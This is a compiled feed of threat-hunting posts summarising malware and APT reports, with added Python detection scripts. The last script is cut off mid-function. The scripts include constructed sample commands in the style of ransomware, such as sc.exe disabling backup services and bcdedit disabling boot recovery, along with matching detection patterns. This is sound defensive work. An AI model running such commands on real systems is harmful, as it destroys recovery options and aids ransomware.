#getHunting

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2025-05-22

If RMM tool abuse is something you are concerned about, check out this community hunt package! This hunt package is designed to identify when a service is created to run AnyDesk, which was a tactic the adversary used in this report! Hope you enjoy and Happy Hunting!

AnyDesk Service Installation - Potentially Malicious RMM Tool Installation
hunter.cyborgsecurity.io/resea

#huntoftheday #gethunting

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2025-03-17

I know I was away for a while but I'll make it up to you! Check out our Hunt Package Collection that focuses on Volt Typhoon! We have multiple community edition hunt packages that can get you started! Now, the next steps are up to you! Happy Hunting!

Volt Typhoon Hunt Package Collection
hunter.cyborgsecurity.io/resea

#huntoftheday #gethunting

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2025-02-25

AND A HUNT OF THE DAY!?! You know it! Looking at where the malware created their scheduled task you can tell it is a little phishy, but there are more locations that adversaries like to use/abuse! See what you can find in your environment with this! Yes, it is community and I hope it gets you off on your journey if you haven't started OR it adds another tool to your existing toolbox! Happy Hunting!

Scheduled Task Executing from Abnormal Location
hunter.cyborgsecurity.io/resea

#huntoftheday #gethunting #HappyHunting

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2025-02-21

To complement the work of the authors, why not take this Community Hunt Package with you to identify when a PowerShell encoded command is executed in your environment:

Powershell Encoded Command Execution
hunter.cyborgsecurity.io/resea

#huntoftheday #gethunting

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2025-02-19

I had this all ready but forgot to send yesterday! For your #huntoftheday I would recommend conducting an unstructured hunt on processes making network detections that could lead to C2 activity! Enjoy and Happy Hunting!

#gethunting

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2025-02-13

And, if you are taking this wonderful intel and using it to threat hunt, why not let us help you! Check out this Community Hunt Package that helps identify when AnyDesk is executed from an abnormal folder. Yes, it wasn't mentioned in the article, but there are PLENTY of examples of this abuse in many other articles! Enjoy and Happy Hunting!

AnyDesk Execution from Abnormal Folder - Potential Malicious Use of RMM Tool
hunter.cyborgsecurity.io/resea

#huntoftheday #gethunting

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2025-02-10

Don't think I was going to leave you hanging! If you haven't got this hunt package yet, what are you waiting for? This is probably the top community hunt package I post because the technique is SO common! Let us help you hunt for persistence through the modification of the Windows Run Registry key and other locations. I promise, the NanoCore RAT is not the only malware to use it, so you've got multiple threats covered. Enjoy and Happy Hunting!

Autorun or ASEP Registry Key Modification
hunter.cyborgsecurity.io/resea

#huntoftheday #gethunting

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2025-02-07

And more good news! I am going to leave you with a community hunt package from our Ransomware Collection for you to stay diligent in your threat hunting efforts! So go get hunting!

Windows sc Used to Disable Multiple Services in Brief Period - Potential Ransomware
hunter.cyborgsecurity.io/resea

#huntoftheday #gethunting

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2025-01-31

And as a gift for you on Friday, here are TWO community hunt packages you can use to hunt for similar suspicious activity! Happy Hunting!

Scheduled Task Executing from Abnormal Location

hunter.cyborgsecurity.io/resea

This hunt package is designed to capture activity associated with a scheduled task which includes abnormal locations in its details for execution. This is often a mark of persistence or malicious tasks created by malware or attackers.

Potential Maldoc Execution Chain Observed

hunter.cyborgsecurity.io/resea

Detect the aftermath of a successfully delivered and executed maldoc (Microsoft Office). A detection indicates an Office document was opened from an email or download/link, spawned a suspicious execution, and attempted to execute code via common Windows binaries (e.g., powershell, cmd, rundll32).

#huntoftheday #gethunting

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2024-12-12

Good day everyone!

Sophos has released their second "Active Adversary Report" of 2024 where they look specifically at patterns and developments they noted during the first half of the year. They provided 3 key takeaways which were:

- Abuse of built-in Microsoft services (LOLbins) is up - way up
- RDP (Remote Desktop Protocol) abuse continues rampant, with a twist
- The ransomware scene: Banyans vs poplars.

LOLBIN abuse:
The Sophos researchers organized all their data and found that RDP, cmd.exe, and powershell were the top hitters for most prevalent LOLBIN being abused, and they share the trend of LOLBIN abuse, showing which applications are being seen more or less in the first part of 2024 compared to 2023. Notable increases were seen in cmd.exe, net.exe, notepad.exe and ipconfig.exe. Notable decreases were PsExec, Task Scheduler, and a slight decrease in RDP, even though it remains at the top.

Now the question is, how does this help you and what are you going to do about it? Well, there is always the question as to whether to run a structured or unstructured hunt. For unstructured, I would prioritize that list from first to last and look for anomalies in the data. For structured hunts, I would try to better understand the behavior and the reason the adversaries are using them. Then you can focus on these behaviors, improve your query using different options/flags/parameters (whatever you want to call them) and dig deeper. Use the knowledge you have of how they have been used maliciously in the past to help guide you! Enjoy and Happy Hunting!

The Bite from Inside: The Sophos Active Adversary Report
news.sophos.com/en-us/2024/12/

Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #huntoftheday #gethunting Cyborg Security, Now Part of Intel 471

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2024-12-09

Happy Monday everyone!

Kaspersky researchers discovered the #RedLineStealer being spread through a well-known HPDxLIB activator when adversaries published links directing unknown victims to a malicious version of the software. The malicious software involved a malicious DLL getting loaded by "1cv8.exe" which would load another malicious library which would launch the stealer.

Looking at a report that was published earlier this year, McAfee researchers detailed some of the behaviors that are attributed to the RedLine Stealer. There was a creation of a "readme.txt" file in a C:\Program Files\ directory (most likely the directory of the malicious version of the legitimate software that was downloaded), there was a scheduled task created that referenced the "readme.txt", and a .cmd file that was created in the C:\Windows\Setup\Scripts\ directory that started a randomly named executable that once again, referenced the readme.txt file.

If I were hunting for this, I would start with scheduled tasks being created in my environment that may not match the naming convention established by my business. Enjoy the read and go get hunting! Happy Hunting!

RedLine info-stealer campaign targets Russian businesses through pirated corporate software
securityaffairs.com/171771/cyb

(You can find the original report in the link provided by this Security Affairs article.)

Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #huntoftheday #gethunting Cyborg Security, Now Part of Intel 471
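
Pulling together the scheduled-task hunts from this feed (the 2025-02-25 and 2025-01-31 "Scheduled Task Executing from Abnormal Location" packages and the naming-convention hunt suggested in this RedLine post), here is an added example written for this page; it is not a Cyborg Security / Intel 471 hunt package and not code from the cited reports. It triages Windows Security event 4698 ("A scheduled task was created") records, which carry the task definition XML in their TaskContent field. The sample events, the list of suspicious directories and the CORP-<Team>-<Purpose> naming convention are all constructed assumptions to tune for your own environment.

```python
"""Hunt: scheduled tasks whose action runs from an abnormal location or whose name
breaks the organisation's naming convention.  Added example; events are constructed
in the shape of Windows Security event 4698 (TaskName + TaskContent XML)."""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations a business task should rarely execute from (assumption: tune per environment).
SUSPICIOUS_DIRS = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\",
                   "\\windows\\setup\\scripts\\", "\\perflogs\\", "\\$recycle.bin\\")
# Script hosts and LOLBINs that deserve a second look when they are a task's action.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Hypothetical convention: Microsoft's own tasks, or CORP-<Team>-<Purpose> (assumption).
NAME_CONVENTION = re.compile(r"^\\(?:Microsoft\\.+|CORP-[A-Za-z]+-[A-Za-z0-9]+)$")


def parse_task_actions(task_xml):
    """Return [(command, arguments), ...] from the <Actions><Exec> nodes of a task definition."""
    root = ET.fromstring(task_xml)
    actions = []
    for node in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = (node.findtext("t:Command", default="", namespaces=TASK_NS) or "").strip()
        args = (node.findtext("t:Arguments", default="", namespaces=TASK_NS) or "").strip()
        actions.append((cmd, args))
    return actions


def triage_task(event):
    """Reasons a 4698 event deserves a hunter's attention; an empty list means it looks routine."""
    reasons = []
    name = event["TaskName"]
    if not NAME_CONVENTION.match(name):
        reasons.append(f"task name '{name}' is outside the naming convention")
    for cmd, args in parse_task_actions(event["TaskContent"]):
        target = f"{cmd} {args}".lower()
        hit = next((d for d in SUSPICIOUS_DIRS if d in target), None)
        if hit:
            reasons.append(f"action references abnormal location '{hit}'")
        exe = cmd.lower().rsplit("\\", 1)[-1]
        if exe in SCRIPT_HOSTS:
            reasons.append(f"action runs script host {exe}")
    return reasons


def hunt_scheduled_tasks(events):
    """Map (computer, task name) -> reasons, for every event that tripped at least one rule."""
    return {(e["Computer"], e["TaskName"]): r for e in events if (r := triage_task(e))}


def task_xml(command, arguments=""):
    """Constructed minimal task definition in the shape Task Scheduler emits."""
    return ('<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            '<Actions Context="Author"><Exec>'
            f'<Command>{command}</Command><Arguments>{arguments}</Arguments>'
            '</Exec></Actions></Task>')


SAMPLE_EVENTS = [  # constructed 4698 events, not real telemetry
    {"Computer": "WS01", "TaskName": r"\CORP-IT-Backup",
     "TaskContent": task_xml(r"C:\Program Files\CorpBackup\backup.exe", "--nightly")},
    {"Computer": "WS01", "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "TaskContent": task_xml(r"%windir%\system32\defrag.exe", "-c -h -o")},
    {"Computer": "WS02", "TaskName": r"\Updater",
     "TaskContent": task_xml(r"C:\Windows\Setup\Scripts\update.cmd")},
    {"Computer": "WS03", "TaskName": r"\OneDriveSync",
     "TaskContent": task_xml("powershell.exe",
                             r"-w hidden -File C:\Users\jdoe\AppData\Roaming\sync.ps1")},
]

if __name__ == "__main__":
    for key, reasons in hunt_scheduled_tasks(SAMPLE_EVENTS).items():
        print(key, "->", "; ".join(reasons))
```

Only the "\Updater" and "\OneDriveSync" tasks come back; the first breaks the convention and runs from C:\Windows\Setup\Scripts (the location the RedLine write-up mentions), the second additionally launches a script host from a user profile. In production, feed the function from your SIEM's 4698 (or Sysmon-observed schtasks.exe) data and grow SUSPICIOUS_DIRS from what your own baseline shows.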

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2024-12-02

Happy Monday everyone, it is hard to believe it is December already!

Researchers at ANY.RUN - Interactive Malware Analysis Service found an interesting technique used by adversaries to trick their victims into compromising themselves using corrupted Word documents. The attackers send corrupted Word documents that bypass security software due to their damaged state but are still recoverable by the applications. Once the target recovers it, they are presented with a QR code to scan that is paired with the logo of a legitimate organization to make it look more legitimate. The target or potential victim is then taken to a phishing site that masquerades as a Microsoft login page in order to steal the legitimate credentials.

Looking at potential hunting opportunities it may be a little harder to find than most "macro enabled document" situations because the goal appears to be to have the user use a different device to scan the QR code and enter their credentials. In that case, if there are any reports of corrupted documents finding their way to users' emails, I would begin a hunt for abnormal login attempts! Enjoy and Happy Hunting!

Any.Run Twitter source:
x.com/anyrun_app/status/186102

Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #huntoftheday #gethunting CyborgSecInc

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2024-11-27

Happy Wednesday everyone!

While researching the #BlackBasta ransomware, I came across a couple great articles (not that all of them aren't great, I just haven't read ALL of them).

The first is from RedSense, a threat intelligence org that takes a deep dive into "The Evolution of BlackBasta Malware Dissemination" where they look at BlackBasta activity from 2022 up to today. They provide historic examples of what led up to this point but also provide wonderful technical details on malware and behaviors. In 2024 they were seen exploiting Microsoft Teams vulnerabilities and tricking victims into downloading RMM tools like AnyDesk to gain access to their machine and network.

One behavior that may indicate that you are a victim of ANY ransomware, but one attributed to BlackBasta, is suspicious BCDEdit.exe activity. BCDEdit is a command-line tool for managing Boot Configuration Data, or BCD, and the ransomware modifies the configuration to prevent recovery.

This is a great article and I hope you get as much out of it as I did! Happy Hunting!

The Evolution of BlackBasta Malware Dissemination
redsense.com/publications/evol

Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #huntoftheday #gethunting Cyborg Security, Now Part of Intel 471
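
The two ransomware-preparation behaviors called out in this feed, sc.exe disabling many services in a brief period (the 2025-02-07 hunt package) and the suspicious BCDEdit activity noted in this post, can be hunted over process-creation telemetry. The block below is an added example for this page, not a Cyborg Security / Intel 471 hunt package and not code from the RedSense report. Events are constructed in the shape of Sysmon event 1 / Security 4688 (host, timestamp, user, command line); the 60-second window and the threshold of five distinct services are assumptions to baseline against your own change windows.

```python
"""Hunt: sc.exe used to stop, delete or disable many services in a brief period, plus
bcdedit.exe disabling Windows recovery.  Added example over constructed process events."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # "brief period" (assumption)
THRESHOLD = 5                   # distinct services touched inside one window (assumption)

# optional path / quotes, optional \\remotehost, then the verb and the service name
SC_CMD = re.compile(
    r'(?i)^\s*"?(?:[a-z]:\\[^"]*\\)?sc(?:\.exe)?"?\s+(?:\\\\\S+\s+)?'
    r'(config|stop|delete)\s+"?([^\s"]+)"?(.*)$')
START_DISABLED = re.compile(r"(?i)\bstart=\s*disabled\b")
# bcdedit settings ransomware uses to keep Windows from offering recovery at boot
BCDEDIT_TAMPER = re.compile(
    r"(?i)\bbcdedit(?:\.exe)?\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b")


def sc_target(cmdline):
    """Service name if the command stops, deletes or sets a service to disabled, else None."""
    m = SC_CMD.match(cmdline)
    if not m:
        return None
    verb, svc, rest = m.group(1).lower(), m.group(2).lower(), m.group(3)
    if verb == "config" and not START_DISABLED.search(rest):
        return None  # 'sc config X start= auto' is a reconfiguration, not a disable
    return svc


def find_service_bursts(events):
    """One alert per host where >= THRESHOLD distinct services were hit within WINDOW."""
    rows = defaultdict(list)
    for e in events:
        svc = sc_target(e["cmd"])
        if svc:
            rows[e["host"]].append((datetime.fromisoformat(e["ts"]), svc, e["user"]))
    alerts = []
    for host, hits in rows.items():
        hits.sort()
        for i, (t0, _, user) in enumerate(hits):
            seen = {svc for t, svc, _ in hits[i:] if t - t0 <= WINDOW}
            if len(seen) >= THRESHOLD:
                alerts.append({"host": host, "user": user, "start": t0.isoformat(),
                               "services": sorted(seen)})
                break  # the first qualifying window is enough to open a hunt on this host
    return alerts


def find_recovery_tampering(events):
    """Every bcdedit invocation that disables recovery or tells Windows to ignore boot failures."""
    return [{"host": e["host"], "ts": e["ts"], "cmd": e["cmd"]}
            for e in events if BCDEDIT_TAMPER.search(e["cmd"])]


def _ev(host, ts, cmd, user="CORP\\jdoe"):
    return {"host": host, "ts": ts, "user": user, "cmd": cmd}


SAMPLE_EVENTS = [  # constructed, not real telemetry
    _ev("WS01", "2025-02-07T09:00:00",
        '"C:\\Windows\\System32\\sc.exe" config MSSQLSERVER start= disabled'),
    _ev("WS01", "2025-02-07T09:00:05", "sc stop SQLWriter"),
    _ev("WS01", "2025-02-07T09:00:10", "sc config vss start= disabled"),
    _ev("WS01", "2025-02-07T09:00:15", "sc stop wbengine"),
    _ev("WS01", "2025-02-07T09:00:20", "sc config VeeamDeploySvc start= disabled"),
    _ev("WS01", "2025-02-07T09:00:25", "sc delete BackupExecAgent"),
    _ev("WS01", "2025-02-07T09:00:30", "sc query"),
    _ev("WS01", "2025-02-07T09:01:00", "bcdedit /set {default} recoveryenabled no"),
    _ev("WS01", "2025-02-07T09:01:05", "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    _ev("WS02", "2025-02-07T10:00:00", "sc stop Spooler", user="CORP\\helpdesk"),
    _ev("WS02", "2025-02-07T10:00:10", "sc config Spooler start= disabled", user="CORP\\helpdesk"),
    _ev("WS02", "2025-02-07T11:00:00", "sc config wuauserv start= auto", user="CORP\\helpdesk"),
]

if __name__ == "__main__":
    print(find_service_bursts(SAMPLE_EVENTS))
    print(find_recovery_tampering(SAMPLE_EVENTS))
```

WS01 trips the burst rule (six backup and database services in 25 seconds) and both bcdedit rules; WS02's helpdesk activity on a single service does not. Patch-management and decommissioning runs will also touch many services quickly, so pair the burst alert with the user, the parent process and whether a change ticket exists before escalating.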

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2024-11-26

Good day everyone!

A Chinese APT group, #EarthEstries, makes headlines today in an article from Trend Micro researchers. Earth Estries has been targeting critical sectors like telecommunications and government entities across the US, Asia-Pacific, Middle East, and South Africa since 2023, so they have a significant global footprint. They like to target public-facing server vulnerabilities for initial access, abuse living-off-the-land binaries (LOLBINs) for lateral movement, deploy backdoors such as GHOSTSPIDER, SNAPPYBEE, and MASOL RAT, and use advanced techniques.

In this report, you can see the commands that were issued for lateral movement through WMIC.exe, discovery activity using ping.exe to output to a file (most likely for reading by the adversary later), more discovery activity using wevtutil.exe looking at event code 4624 (Process Create) and then the PSEXEC.exe activity that first accepted the end user license agreement ("accepteula"), and finally the execution of a bat file.

You are probably thinking, well, where do I start hunting for this activity? A quick win that I can share with you is looking for that first execution of a Sysinternals tool, which modifies a registry key when the "accepteula" parameter is issued.

Now enjoy the rest of the article that I omitted and go get hunting! Happy Hunting!

Game of Emperor: Unveiling Long Term Earth Estries Cyber Intrusions
trendmicro.com/en_us/research/

Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #huntoftheday #gethunting Cyborg Security
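
Both registry-based quick wins in this feed, the Autorun/ASEP key modification hunt (2025-02-10 package) and the Sysinternals "accepteula" write described in this post, come from the same telemetry: registry value-set events. The block below is an added example for this page, not a Cyborg Security / Intel 471 hunt package and not code from the Trend Micro report. It runs over constructed Sysmon event 13 (RegistryEvent, value set) records; the ASEP patterns are a starter list rather than a complete catalogue, and the user-writable paths used to raise priority are an assumption. One caveat a practitioner should keep in mind when reading the post above: Windows event ID 4624 is a successful logon, while process creation is 4688; a wevtutil query for 4624 is logon discovery. PsExec and the other Sysinternals tools record acceptance as `HKCU\Software\Sysinternals\<Tool>\EulaAccepted` = 1, which Sysmon reports under `HKU\<SID>\...`.

```python
"""Hunt: registry value-set events that touch autostart (ASEP) locations, and the
EulaAccepted value a Sysinternals tool writes on first run with -accepteula.
Added example over constructed Sysmon event 13 records."""
import re

ASEP_KEYS = [re.compile(p, re.I) for p in (
    r"\\software\\(?:wow6432node\\)?microsoft\\windows\\currentversion\\run(?:once|onceex|services|servicesonce)?\\",
    r"\\software\\microsoft\\windows nt\\currentversion\\winlogon\\(?:shell|userinit|notify)",
    r"\\software\\microsoft\\windows\\currentversion\\policies\\explorer\\run\\",
    r"\\software\\microsoft\\windows\\currentversion\\explorer\\(?:user )?shell folders\\(?:common )?startup",
)]
# Sysinternals tools record EULA acceptance under Software\Sysinternals\<Tool>\EulaAccepted
SYSINTERNALS_EULA = re.compile(r"\\software\\sysinternals\\([^\\]+)\\eulaaccepted$", re.I)
# Paths in the autostart data or the writing image that raise priority (assumption)
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\")


def triage_registry_event(ev):
    """Return a finding for an EID 13 event that touches a hunted location, else None."""
    target, details, image = ev["TargetObject"], ev["Details"], ev["Image"]
    m = SYSINTERNALS_EULA.search(target)
    if m:
        return {"rule": "sysinternals_eula", "severity": "medium", "host": ev["Computer"],
                "tool": m.group(1), "image": image, "target": target}
    if any(k.search(target) for k in ASEP_KEYS):
        blob = (details + " " + image).lower()
        sev = "high" if any(d in blob for d in USER_WRITABLE) else "low"
        return {"rule": "asep_write", "severity": sev, "host": ev["Computer"],
                "image": image, "target": target, "details": details}
    return None


def hunt_registry_events(events):
    """All findings, in event order; 'low' ASEP writes are the installer noise to baseline away."""
    return [f for f in map(triage_registry_event, events) if f]


SID = "S-1-5-21-1111-2222-3333-1001"
SAMPLE_EVENTS = [  # constructed Sysmon EID 13 records, not real telemetry
    {"Computer": "WS01", "Image": "C:\\Users\\admin\\Downloads\\PsExec.exe",
     "TargetObject": f"HKU\\{SID}\\Software\\Sysinternals\\PsExec\\EulaAccepted",
     "Details": "DWORD (0x00000001)"},
    {"Computer": "WS01", "Image": "C:\\Windows\\System32\\msiexec.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SecurityHealth",
     "Details": "%windir%\\system32\\SecurityHealthSystray.exe"},
    {"Computer": "WS02", "Image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\svchost.exe",
     "TargetObject": f"HKU\\{SID}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdate",
     "Details": "C:\\Users\\jdoe\\AppData\\Roaming\\svchost.exe"},
    {"Computer": "WS02", "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell",
     "Details": "explorer.exe, C:\\ProgramData\\update\\run.exe"},
    {"Computer": "WS03", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "TargetObject": f"HKU\\{SID}\\Software\\Microsoft\\Office\\16.0\\Word\\Options\\Foo",
     "Details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for f in hunt_registry_events(SAMPLE_EVENTS):
        print(f["severity"], f["rule"], f["host"], f["target"])
```

The Word options write is ignored, the SecurityHealth value is reported at low priority (data and writer both live under the Windows directory), and the two persistence writes pointing into AppData and ProgramData come back high. The EulaAccepted finding names the tool from the key path, so the same rule catches PsExec, ProcDump and the rest of the suite on their first run.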

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2024-10-11

Happy Friday everyone!

A Joint Advisory from the National Security Agency, Federal Bureau of Investigation (FBI), Cyber National Mission Force, and the National Cyber Security Centre provides updates on the Russian Federation's Foreign Intelligence Service, or #SVR.

According to the advisory, #APT29 (a.k.a Midnight Blizzard, Cozy Bear, and the Dukes) has targeted the defense, technology, and finance sectors to collect foreign intelligence and enable future cyber operations. They aim to exploit software vulnerabilities for initial access and escalate privileges. They also utilize spearphishing campaigns, password spraying, abuse of supply chain and trusted relationships. They also utilize custom malware and living-off-the-land (LOLBINs) techniques for multiple techniques.

The report includes a list of #CVEs that APT29 has been observed exploiting and attaches the vendor and product that are affected with details that describe the vulnerability, along with a section of mitigations that your organization can take to increase your security posture.

If you are looking for behaviors that are attributed to APT29, look no further than the MITRE ATT&CK Matrix! This resource has collected historic #TTPs and behaviors and referenced them as well. So while you are working on hardening your environment you can also hunt for their activity as well! Enjoy and Happy Hunting!

Article Source:
Update on SVR Cyber Operations and Vulnerability Exploitation
ic3.gov/Media/News/2024/241010

Mitre source:
attack.mitre.org/groups/G0016/

Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #huntoftheday #gethunting Cyborg Security, Now Part of Intel 471

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2024-08-29

Thank you all for awaiting patiently for your Threat Hunt Tip of the Day! And here you go!

I am not going to touch on the Windows Registry Run key that was mentioned, I lost track of how many times I shared that hunt package, even though it still proves to be useful, but what I will talk about are RMM tools. This list consists of tools like AnyDesk (seen in the Microsoft article), TeamViewer, AteraAgent, and many more!

How do you approach this? Hopefully you have an inventory and hopefully you have an application allow-list. If you have both of these, it's a great start, but if you are like some organizations and living in the wild-west, it might be tougher. I would simply create a list of all the RMMs out there that have been abused by threat actors and search for them in your environment. Compare that to the software inventory if you have it and compare that to the application allow-list (if you have that as well) and then see what your data is telling you. This could be a quick win, especially if you see AnyDesk floating around your environment but no one approved it! Well, what are you waiting for? Go get those items and get hunting! Happy Hunting!

Nice little resource for RMMs from Red Canary!
redcanary.com/threat-detection

Cyborg Security Intel 471 #CyberSecurity #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #gethunting #huntoftheday
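
The three RMM hunts in this feed (AnyDesk installed as a service, 2025-05-22; AnyDesk executed from an abnormal folder, 2025-02-13; and the inventory versus allow-list comparison described in this post) can be run as one pass over the same telemetry. The block below is an added example for this page, not a Cyborg Security / Intel 471 hunt package. The RMM catalogue, expected install directories, software inventory, allow-list and events are all constructed assumptions; events mirror Sysmon event 1 (process create) and System event 7045 (service installed), and a maintained catalogue such as the Red Canary resource linked above should replace the starter list.

```python
"""Hunt: RMM tools seen in process and service-install telemetry, compared against the
software inventory and the application allow-list.  Added example; all inputs constructed."""
import ntpath

# Starter catalogue of RMM binaries (assumption; extend from a maintained list).
RMM_CATALOG = {
    "AnyDesk": {"anydesk.exe"},
    "TeamViewer": {"teamviewer.exe", "teamviewer_service.exe"},
    "Atera": {"ateraagent.exe"},
    "ScreenConnect": {"screenconnect.clientservice.exe"},
}
# Where a sanctioned install is expected to live (assumption); a copy in Downloads is not.
EXPECTED_DIRS = {
    "AnyDesk": {"c:\\program files (x86)\\anydesk", "c:\\program files\\anydesk"},
    "TeamViewer": {"c:\\program files\\teamviewer", "c:\\program files (x86)\\teamviewer"},
}


def identify_rmm(exe_path):
    """Catalogue name for an executable path, or None."""
    base = ntpath.basename(exe_path).lower()
    return next((tool for tool, bins in RMM_CATALOG.items() if base in bins), None)


def exe_from_imagepath(image_path):
    """Executable from a 7045 ImagePath, which may be quoted and carry service arguments."""
    s = image_path.strip()
    if s.startswith('"'):
        return s[1:s.index('"', 1)]
    return s.split(" ", 1)[0]


def hunt_rmm(process_events, service_events, inventory, allowlist):
    findings, observed = [], set()  # observed: (host, tool) pairs seen in any telemetry
    for ev in process_events:
        tool = identify_rmm(ev["Image"])
        if not tool:
            continue
        observed.add((ev["Computer"], tool))
        if tool in EXPECTED_DIRS and ntpath.dirname(ev["Image"]).lower() not in EXPECTED_DIRS[tool]:
            findings.append({"rule": "rmm_abnormal_folder", "host": ev["Computer"], "tool": tool,
                             "severity": "high", "image": ev["Image"]})
    for ev in service_events:
        exe = exe_from_imagepath(ev["ImagePath"])
        tool = identify_rmm(exe)
        if not tool:
            continue
        observed.add((ev["Computer"], tool))
        # a sanctioned install also registers a service, so only unapproved tools are high
        findings.append({"rule": "rmm_service_install", "host": ev["Computer"], "tool": tool,
                         "severity": "info" if tool in allowlist else "high",
                         "service": ev["ServiceName"], "image": exe})
    for host, tool in sorted(observed):
        if tool not in allowlist:
            in_inv = tool in inventory.get(host, set())
            findings.append({"rule": "unapproved_rmm", "host": host, "tool": tool,
                             "severity": "medium" if in_inv else "high", "in_inventory": in_inv})
    return findings


INVENTORY = {"WS01": {"AnyDesk", "Microsoft Office"}, "SRV02": set(), "WS03": {"TeamViewer"}}
ALLOWLIST = {"TeamViewer"}  # assumption: the only RMM the business has approved
PROCESS_EVENTS = [  # constructed Sysmon EID 1 records
    {"Computer": "WS01", "Image": "C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe"},
    {"Computer": "SRV02", "Image": "C:\\Users\\svc_backup\\Downloads\\AnyDesk.exe"},
    {"Computer": "WS03", "Image": "C:\\Program Files\\TeamViewer\\TeamViewer.exe"},
    {"Computer": "WS01", "Image": "C:\\Windows\\System32\\svchost.exe"},
]
SERVICE_EVENTS = [  # constructed System 7045 records
    {"Computer": "SRV02", "ServiceName": "AnyDesk Service",
     "ImagePath": '"C:\\Users\\svc_backup\\Downloads\\AnyDesk.exe" --service'},
    {"Computer": "WS03", "ServiceName": "TeamViewer",
     "ImagePath": '"C:\\Program Files\\TeamViewer\\TeamViewer_Service.exe"'},
]

if __name__ == "__main__":
    for f in hunt_rmm(PROCESS_EVENTS, SERVICE_EVENTS, INVENTORY, ALLOWLIST):
        print(f["severity"], f["rule"], f["host"], f["tool"])
```

SRV02 is the host to look at first: AnyDesk runs from a service account's Downloads folder, registers itself as a service from there, and is in neither the inventory nor the allow-list. WS01's AnyDesk is in the inventory but was never approved, which is exactly the "floating around but no one approved it" case; WS03's TeamViewer service is reported only as informational.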

Just Another Blue Teamer (LeeArchinal@ioc.exchange)
2024-08-28

For your Threat Hunting Tip of the Day:

Masquerading is a common technique used by attackers and by using legitimate names for their malicious programs it makes the victims more likely to click the application. But, as a hunter, what can you do? Easy: Look at the process chain!

Part of Threat Hunting is learning your environment and by identifying process chains that are legitimate in your environment, you can start to look for process chains that may not make sense. So when you are looking at "legit" sounding apps that are executing, make sure you look at the parent process!

Good luck and Happy Hunting!

Cyborg Security Intel 471 #CyberSecurity #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #huntoftheday #gethunting!
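
Looking at the process chain, as this tip recommends, is also what the "Potential Maldoc Execution Chain Observed" package from 2025-01-31 is doing. The block below is an added example for this page, not a Cyborg Security / Intel 471 hunt package. It applies two chain rules to constructed Sysmon event 1 records: an Office application spawning a script host or LOLBIN, and a well-known Windows binary name running from the wrong directory or under a parent it should never have. The expected directories and parents are a starter baseline and an assumption; learn them from your own environment as the post says.

```python
"""Hunt: process chains that do not make sense (maldoc execution chain, masquerading).
Added example over constructed Sysmon event 1 records."""
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msbuild.exe"}
# name -> (expected directory, expected parent names); assumption, baseline it per environment
SYSTEM_BINARIES = {
    "svchost.exe": ("c:\\windows\\system32", {"services.exe"}),
    "lsass.exe": ("c:\\windows\\system32", {"wininit.exe"}),
    "csrss.exe": ("c:\\windows\\system32", {"smss.exe"}),
    "taskhostw.exe": ("c:\\windows\\system32", {"svchost.exe"}),
    "explorer.exe": ("c:\\windows", {"userinit.exe", "explorer.exe"}),
}


def _name(path):
    return ntpath.basename(path).lower()


def triage_process(ev):
    """Reasons a process-create event breaks the expected chain (empty = looks normal)."""
    reasons, name, parent = [], _name(ev["Image"]), _name(ev["ParentImage"])
    if parent in OFFICE_APPS and name in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {name} (maldoc execution chain)")
    if name in SYSTEM_BINARIES:
        exp_dir, exp_parents = SYSTEM_BINARIES[name]
        actual_dir = ntpath.dirname(ev["Image"])
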